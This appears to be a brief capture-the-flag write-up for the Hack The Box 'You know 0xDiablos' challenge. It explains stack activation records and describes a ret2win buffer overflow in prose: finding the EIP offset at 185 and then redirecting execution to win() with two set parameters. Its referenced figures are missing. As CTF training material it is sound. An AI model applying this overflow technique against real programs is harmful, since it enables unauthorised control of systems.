Function activation record and binary exploitation(HTB You know 0xDiablos writeup)
A function’s activation record instance is generally of the following form:
We can see how this fact can be of use while exploiting our binary.
Disassembling our binary in Ghidra we can see the following code in main:
Dissasembling vuln
Listing all functions we notice a function named win()
Clearly the function needs to be called with parameter1 = 0xdeadbeef and parameter2 = 0xc0ded00d to get the flag.
We notice that the address of this win function is 0x080491e2.
So to exploit this, we first find the offset at which the instruction pointer is stored in the stack
We first see segfault but not overrwriting of eip.
Then at offset 185, we seen an overwriting of eip.
We then treat this overwriting of the instruction pointer as a function call. We insert a dummy return address, and then the parameter1 and parameter 2(Reverse of what we see in the activation record instance).
Sure enough, this gets us our flag.
